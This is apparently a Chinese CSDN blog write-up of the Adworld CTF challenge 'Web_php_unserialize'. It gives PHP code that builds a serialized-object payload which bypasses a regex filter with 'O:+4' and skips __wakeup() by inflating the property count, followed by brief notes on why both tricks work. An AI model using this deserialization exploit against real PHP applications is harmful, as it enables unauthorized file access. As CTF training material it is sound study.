【无标题】

攻防世界-Web_php_unserialize详解-CSDN博客

上述为借鉴地址。

攻防世界 

Web_php_unserialize

用来绕过正则和__wakeup()的php代码:

class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
}
	$xx = new Demo("fl4g.php");
	$c = serialize($xx);
	echo $c;
	echo "<br/>";

	$d = str_replace('O:4', 'O:+4',$c);//绕过preg_match
    $d = str_replace(':1:', ':2:',$d);//绕过wakeup
	echo $d;
	echo "<br/>";
	echo(urlencode($d));
	echo "<br/>";
	$f = base64_encode($d);
	echo $f;

涉及的知识点:

1、php对象属性数量比实际多时,反序列化会绕过__wakeup();

2、php对象不同属性 private public(默认) protected序列化后的结果不同,不要轻易复制序列化结果,最好采用代码处理;

3、如何绕过正则规则 /[oc]:\d+:/i对O:4:的匹配:

php 5中漏洞O:+4: 还是会被反序列化函数正确识别,同时可以绕过上述规则。

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值